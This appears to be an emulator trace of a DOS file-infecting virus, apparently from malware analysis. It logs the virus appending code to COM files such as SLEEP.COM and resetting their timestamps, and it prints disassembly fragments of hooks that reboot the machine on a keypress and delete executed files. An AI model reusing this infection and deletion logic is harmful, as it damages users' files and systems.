2018-12-25T12:35:59.3605225Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.568074083Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.575119315Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.581391613Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.582822647Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.585425639Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.588399729Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.589812534Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.592751289Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.594052353Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.613477574Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.633198538Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.635654638Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.6532702Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.660613782Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.671334461Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.67347675Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.677183195Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.687925121Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.68992791Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.697908153Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.699758084Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.707955659Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.719162298Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.722839116Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.732707923Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.740306809Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.747174988Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.748851865Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.752184939Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.75520628Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.756579108Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.759799376Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.761935079Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.769324268Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.779379779Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.783084292Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.793283789Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.80002727Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.807573951Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.809211464Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.811805516Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.821035502Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.822660749Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.829297451Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.832075974Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.839854798Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.849653311Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.853845503Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.856579465Z 26 PC: 12b96 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.802750483Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.804112339Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.810286151Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.834557118Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.841336453Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.854716657Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.85672383Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.859981593Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.871546185Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.87686625Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.885211165Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.888807728Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.897770867Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.90882815Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.912867402Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.92439442Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.932005322Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.939501072Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.941975247Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.945660435Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.949308419Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.952421741Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.955723497Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.957744766Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.967367208Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.978583653Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.981929955Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.994104335Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.002152384Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.009917697Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.01200621Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.027771764Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.037639506Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.039977924Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.05018517Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.051974238Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.0607807Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.072261694Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.075328261Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.086214698Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.095098057Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.102506464Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.104453293Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.108252415Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.115473089Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.117203135Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.121172151Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.122973486Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.132449141Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.159304618Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.164104946Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.175459732Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.1828298Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.190119044Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.191672215Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.195376248Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.199112173Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.200577542Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.204057123Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.209000743Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.217311222Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.22843805Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.233417932Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.244422858Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.251746494Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.259680063Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.261416186Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.264177822Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.274934257Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.27670491Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.284295181Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.286696538Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.295726957Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.307274357Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.310736124Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.33018394Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.337817583Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.345313435Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.347439814Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.350072325Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.352955055Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.355126505Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.358133038Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.35980058Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.368536204Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.380052391Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.382854039Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.395162672Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.402696658Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.405679878Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.408483784Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.411551015Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.421428535Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.424345612Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.432004618Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.434919425Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.444922007Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.456223318Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.459202918Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.462198245Z 9 PC: 12b2e | Display string (String= 'Bad command or filename')
2018-12-25T12:35:59.464678187Z 53 PC: 12b5f | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:35:59.465841374Z 37 PC: 12b71 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:35:59.467413348Z 53 PC: 12b76 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:35:59.468756866Z 37 PC: 12b88 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:35:59.469802165Z 49 PC: 12b8d | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.806703654Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.80870298Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.816741165Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.841532061Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.85403108Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.864239658Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.866132946Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.869214621Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.882135943Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.885291645Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.893448414Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.895856135Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.904467557Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.915782581Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.920317995Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.935177525Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.942802671Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.950768102Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.95421377Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.956929886Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.960211916Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.969594234Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.973489185Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.97552342Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.984655653Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.995841868Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.999021512Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.011844003Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.019793931Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.027893612Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.03027725Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.032836178Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.042092168Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.043896752Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.051254976Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.05321354Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.061493183Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.068673735Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.071859486Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.083729845Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.092816256Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.100633063Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.102656206Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.106857688Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.110617672Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.112563859Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.116800318Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.119201494Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.127905874Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.140133424Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.143485424Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.158996675Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.168340454Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.176106477Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.17771033Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.180578403Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.185347728Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.187556095Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.19244322Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.196255294Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.205574722Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.217885581Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.222284255Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.234860762Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.242935703Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.251674617Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.254065445Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.257149501Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.267359798Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.270641864Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.278499536Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.280647878Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.291038615Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.303042121Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.306454788Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.318781738Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.327053647Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.334666023Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.337449488Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.341195682Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.345109777Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.347247441Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.351377141Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.35366023Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.362969252Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.377977437Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.381671004Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.392970452Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.401206713Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.40457357Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.406788953Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.410720674Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.42055146Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.422778544Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.431376933Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.434215693Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.44303755Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.455314253Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.458329196Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.461040839Z 26 PC: 12b96 | Set disk transfer address